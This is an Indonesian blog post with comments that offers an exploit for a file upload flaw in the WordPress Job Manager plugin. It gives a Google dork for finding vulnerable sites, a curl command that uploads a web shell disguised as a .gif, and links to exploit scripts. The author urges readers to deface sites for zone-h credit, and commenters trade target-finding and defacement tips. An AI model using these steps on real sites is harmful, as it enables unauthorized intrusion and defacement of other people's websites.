Tuesday, 6 June 2017

WordPress Plugin Job Manager File Upload

Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.

7 comments:

  1. nyari targetnya gimana bang ???

    ReplyDelete
    Replies
    1. inurl:/wp-content/uploads/job-manager-uploads

      Delete
  2. ada tutor deface buat yg blm ngerti apa2 gak om?

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. bro what tool name used in windows to run php files

    ReplyDelete
    Replies
    1. xampp bro

      see tuts: http://www.indoxploit.or.id/2016/07/cara-menjalankan-exploiter-php.html

      Delete